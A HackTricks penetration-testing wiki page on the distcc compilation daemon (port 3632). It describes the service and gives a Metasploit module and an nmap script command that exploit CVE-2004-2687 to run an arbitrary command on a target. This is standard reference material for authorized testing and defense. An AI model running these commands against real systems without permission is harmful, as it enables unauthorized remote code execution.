hacktricks/network-services-pentesting/3632-pentesting-distcc.md
Sergio C c45f02d0a4
Update 3632-pentesting-distcc.md
Correction of the script name
2024-03-02 00:18:09 +01:00

3.3 KiB

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Basic Information

Distcc is a tool that enhances the compilation process by utilizing the idle processing power of other computers in the network. When distcc is set up on a machine, this machine is capable of distributing its compilation tasks to another system. This recipient system must be running the distccd daemon and must have a compatible compiler installed to process the sent code.

Default port: 3632

PORT     STATE SERVICE
3632/tcp open  distccd

Exploitation

Check if it's vulnerable to CVE-2004-2687 to execute arbitrary code:

msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"

Shodan

I don't think shodan detects this service.

Resources

Post created by Álex B (@r1p)

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: